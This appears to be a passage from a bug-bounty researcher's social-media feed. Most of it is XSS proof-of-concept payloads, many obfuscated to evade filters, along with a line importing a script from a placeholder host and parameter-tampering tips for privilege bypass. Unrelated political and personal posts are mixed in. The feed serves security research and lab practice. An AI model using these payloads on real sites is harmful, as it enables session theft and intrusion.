Gaurav Kumar(GDATTACKER)

XSS PoC Styles - Noob alert(1) - Bug Hunter alert(document.domain) - WAF Ninja d=document,b='`',d['loca'%2B'tion']='javascrip'%2B't%26colon;aler'%2B't'%2Bb%2Bd.domain%2Bb - Red Teamer import('//domain.tld/xss2rce.js') - KNOXSS

The "JavaScript:" XSS payload offers ample room for code obfuscation, as it can be encoded multiple times. JavaScript:alert(1) 👇🏾 JavaScript:%61lert(1) 👇🏾 JavaScript:&#37&#54&#49lert(1) 👇🏾 JavaScript:%26%2337%26%2354%26%2349lert(1) Lab gym.brutelogic.net/?p05=%3CIframe…

Quick bug bounty TIPS! ➡️ verified=false → true, “true”, "True", "TRUE", 1, "1", “yes” ➡️ /v3/users/1234 → v1, v0, internal, beta, legacy ➡️ quantity=100 → -1, 0, 9999999999, 1.82376931348623157e+308 ➡️ role=”user” → “admin”, “”, null, “system” ➡️ /admin → /Admin, /ADMIN, /aDmIn Try them now! ✅ Do you have something to add? 👇

Crash Course on JavaScript for XSS Hunters Worth watching, liking and sharing!😎 youtube.com/watch?v=lkIFF4…

Some Neat XSS Tricks </<K><Svg Onload=alert(1)> </<Kno XSS="><Svg Onload=alert(1)> <!<K><Svg Onload=alert(1)> <!<Kno XSS="><Svg Onload=alert(1)> Test them here: gym.brutelogic.net/?p05=any

Dharmendra Pradhan must resign!

A Claude Code skill bundle for bug hunting and external red-team work - 51 skills, 15 slash commands, 574+ disclosed-report patterns curated across 24 vulnerability classes, plus enterprise identity + infrastructure attack matrices. github.com/elementalsouls…

XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC gym.brutelogic.net/?p05=%3CJavaSc… Ref brutelogic.net/research/docs/…

XSS shot for whitelists, might get executed in DOM if attribute is evaluated. 1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;>

@ganaseclabs @D0rkerDevil Wow awesome discovery

New blog from GanaSec: The 2017 Ghost in the Time Machine Hunting IOTimeSyncFamily on macOS Our Researcher Ashish Kunwar (@D0rkerDevil) independently discovered CVE-2026-28969 - a use-after-free race condition in Apple's IOTimeSyncFamily kernel extension.

@HelleLyngSvends @Erroristotle the bjp owned a huge army of trollers and content management groups who do all possible tweeks and tricks but keep fighting. Truth can't escape for long time

Throughout all day I have struggled to log onto my Instagram account. Now I have been suspended. It is a small prize to pay for press freedom, but I’ve never experienced it before.

If you are a cockroach write - Dharmendra Pradhan must resign!

Details of tickets has been shared via dm as requested

@digitalocean what's going on account stuck at verification not getting reply on support ticket but the amount is being used from account help me out

During recent testing on a HubSpot-powered target, I needed a JSONP primitive to complete a DOM XSS chain. One interesting behavior: HubSpot CMS exposes a built-in endpoint in this format: `/_hcms/forms/embed/v3/form/{portalId}/{formId}?callback=alert` Example : `REDACTED. com/_hcms/forms/embed/v3/form/22544793/f411e5de-1b8b-4b19-8e6d-fe003d08cc8b?callback=alert` It's a JSONP endpoint that wraps the response in whatever function name you pass. Just load it as